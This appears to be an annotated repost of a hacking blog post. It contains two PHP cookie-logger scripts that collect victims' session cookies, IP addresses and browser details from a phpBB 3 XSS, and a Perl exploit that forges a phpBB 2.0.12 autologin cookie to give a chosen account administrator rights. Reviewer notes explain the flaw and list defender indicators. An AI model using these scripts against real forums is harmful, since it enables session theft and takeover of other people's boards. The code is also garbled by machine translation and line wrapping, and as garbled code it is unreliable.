Caveats: this depends entirely on the browser content-sniffing a response served as a GIF and executing the script inside it; browsers that honour the declared Content-Type (or an X-Content-Type-Options: nosniff header) will not. It also depends on the uploaded file being fetchable directly under files/ — phpBB 3.0 ships a .htaccess in files/ meant to deny direct access and serves attachments through download/file.php, so on a default install the direct link should be refused; if it is not, that is a misconfiguration to fix. And a session cookie flagged HttpOnly is not visible to document.cookie at all.
Cookie logger (FILE.php). Note: the listing below has been garbled by machine translation (spaces inside variable names, capitalised function names, today() instead of date(), an unterminated string on the $Myemail line) and will not parse as PHP.

$ Ip = $ _SERVER [ 'REMOTE_ADDR'];
$ UserAgent = $ _SERVER [ 'HTTP_USER_AGENT'];
$Accept $ = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE'];
$Cookie = $ _GET [ 'c'];
$Myemail = "YOUR E-MAIL;
$Date = today ( "l, j F, Y, g: ia");
$Subject = "Xss phpBB 3";
$Message = "Xss phpBB 3 () 2006
Ip: $ ipCookies: $ cookiesBrowser: $ userAgentLanguage: $ accept
URL: Basic $Day & Time: $ today \ n";
$ From = "From: $ myemail \ r \ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>

**************************************
Change: $ myemail = "YOUR E-MAIL;
Eg: [email]tua@mail.com[/email]
**************************************
Cookie logger, alternative version (FILE.php). Also garbled as pasted — it writes $ Cookies although only $ Cookie is ever assigned, and the function names are capitalised — and it appends every hit to a plain file.txt next to the script.

$ Cookie = $ _GET [ 'c'];
$ Ip = getenv ( 'REMOTE_ADDR');
$ Date = date ( "j F, Y, g: ia");
$ Referer = getenv ( 'HTTP_REFERER');
$ Fp = fopen ( 'file.txt', 'a');
Fwrite ($ fp, 'Cookie:'. $ Cookies. '<br> IP:'. $ Ip. '<br> Date and Time:'. $ Date. '<br> Referer:'. $ Referer. '< br> <br> <br> ');
Fclose ($ fp);  


Ok, I wasn't too sure on releasing this perl script because it's very accurate and works 90% of the time in getting you admin rights. But like I said it's for educational purposes only. Code below, please don't make me regret this.

Reviewer's note: the "90%" applies to its target only — phpBB 2.0.12 and earlier with the autologinid bypass, which phpBB fixed in 2.0.13 back in 2005 — so a patched or current board is simply not affected, and as pasted the script does not even compile (`status_lineunless` on three lines is missing the space before `unless`). Run it only against systems you are authorised to test.




#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this..
# Moded and fixed by Puri
#
# NOTE(review): how it works. The cookie set below is the URL-encoded PHP
# serialization a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";} — i.e.
# autologinid is the boolean true instead of a password hash, and userid is
# "2", phpBB2's default administrator. Vulnerable 2.0.x session code compared
# the cookie's autologinid against the stored hash with PHP's loose "==", so
# true == "<any hash>" held and the request was treated as a logged-in admin
# (reported and fixed in phpBB 2.0.13, 2005 — check the advisory for exact
# versions). With that session the script looks up <username> in the ACP
# (admin/admin_ug_auth.php) to learn its numeric id, then posts
# userlevel=admin for it.
#
# NOTE(review): as pasted this does not compile — "status_lineunless" on the
# three die lines is missing a space ("status_line unless"), and the cookie
# literal contains a stray "%  3A6" inserted by line wrapping. Left
# byte-for-byte as found. Other nits: duplicate 'mode' key in the first POST
# (harmless in a list), s///e with an empty replacement, the sid is taken from
# the first "sid=" on the index page, and "success" is inferred only from the
# substring "phpbbprivmsg" appearing in the index page.
#
# NOTE(review, defender side): the telltale is a phpbb2mysql_data cookie whose
# autologinid deserializes to a boolean (b:1) rather than a 32-character
# string, followed by POSTs to admin/admin_ug_auth.php. Upgrade past 2.0.12 /
# retire phpBB2, and treat any board that was exposed while vulnerable as
# compromised (rotate admin passwords, review user levels).
if (@ARGV < 3)
{
print q(
#-----------------------------------------------------------#
#  phpBB2 Exploit (Admin Rights)- Moded and Fixed by Puri   #
#-----------------------------------------------------------#
# Usage: [website] [folder] [username] [proxy]              #
#-----------------------------------------------------------#
#-----------------------------------------------------------#
# Normal                                                    #
#-----------------------------------------------------------#
# Example 1: phpbb2.pl www.site.com / Puri                  #
# Example 2: phpbb2.pl www.site.com /forum/ Puri            #
# Example 3: phpbb2.pl www.site.com /board/ Puri            #
# Example 4: phpbb2.pl www.site.com /phpbb/ Puri            #
# Example 5: phpbb2.pl www.site.com /phpbb2/ Puri           #
#-----------------------------------------------------------#
# With Proxy                                                #
#-----------------------------------------------------------#
# Proxy 1: phpbb2.pl www.site.com / Puri 127.0.0.1:80       # 
# Proxy 2: phpbb2.pl www.site.com /forum/ Puri 127.0.0.1:80 #
#-----------------------------------------------------------#
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];   # must carry its own leading/trailing slashes, it is concatenated as-is
my $user = $ARGV[2];   # the already-registered account to promote
my $proxy = $ARGV[3];  # optional host:port
my $request = "http://";   # plain HTTP only
$request .= $host;
$request .= $path;

use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
# Forged phpBB2 session cookie (see the header note): autologinid => true,
# userid => "2". Version "0", path "/", domain $host; remaining arguments
# (port, secure, maxage, discard) left empty.
$cookie_jar->set_cookie( "0", "phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%  3A6%3A". "%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/", $host, , , , ,);
if ( defined $proxy) {
# strip an optional http:// prefix, then route HTTP through the proxy
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
# Step 1: fetch the index with the forged cookie. If the board accepted it as
# an admin session, the page is expected to contain "phpbbprivmsg".
my $response = $browser->get($request);
die "Error: ", $response->status_lineunless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is easy to hack, lets do it!\n";
} else {
print "Sorry... cant hack this site."; exit();}
print "\nGet $user ID\n";
# Step 2: reuse the first sid= value on the page for the ACP requests below.
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

# Step 3: ACP user-permissions page, "Look up User" to resolve the username
# to its numeric id (read back from the hidden field named "u").
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_lineunless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Will give $user admin rights\n";

# Step 4: submit the same form with userlevel=admin for that id. Only the HTTP
# status is checked; the page content is not inspected for an actual success.
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_lineunless $response->is_success;
print " Done! $user have admin rights now!\n";  




Sumber : ZhC Blog


















